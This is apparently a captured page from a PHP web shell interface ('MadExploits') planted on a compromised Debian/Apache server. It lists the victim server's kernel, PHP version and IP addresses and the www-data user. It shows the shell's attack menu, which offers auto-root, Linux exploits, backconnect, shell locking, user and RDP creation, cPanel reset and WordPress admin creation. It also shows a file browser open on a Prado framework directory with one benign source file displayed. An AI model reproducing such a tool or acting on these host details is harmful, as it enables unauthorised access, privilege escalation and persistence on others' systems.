Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.135.209.20
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
framework /
Data /
ActiveRecord /
[ HOME SHELL ]
Name
Size
Permission
Action
Exceptions
[ DIR ]
drwxr-xr-x
Relations
[ DIR ]
drwxr-xr-x
Scaffold
[ DIR ]
drwxr-xr-x
TActiveRecord.php
35.17
KB
-rw-r--r--
TActiveRecordConfig.php
4.96
KB
-rw-r--r--
TActiveRecordCriteria.php
945
B
-rw-r--r--
TActiveRecordGateway.php
12.84
KB
-rw-r--r--
TActiveRecordManager.php
3.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TActiveRecordCriteria.php
<?php /** * TActiveRecordCriteria class file. * * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @link http://www.pradosoft.com/ * @copyright Copyright © 2005-2014 PradoSoft * @license http://www.pradosoft.com/license/ * @package System.Data.ActiveRecord */ Prado::using('System.Data.DataGateway.TSqlCriteria'); /** * Search criteria for Active Record. * * Criteria object for active record finder methods. Usage: * <code> * $criteria = new TActiveRecordCriteria; * $criteria->Condition = 'username = :name AND password = :pass'; * $criteria->Parameters[':name'] = 'admin'; * $criteria->Parameters[':pass'] = 'prado'; * $criteria->OrdersBy['level'] = 'desc'; * $criteria->OrdersBy['name'] = 'asc'; * $criteria->Limit = 10; * $criteria->Offset = 20; * </code> * * @author Wei Zhuo <weizho[at]gmail[dot]com> * @package System.Data.ActiveRecord * @since 3.1 */ class TActiveRecordCriteria extends TSqlCriteria { }
Close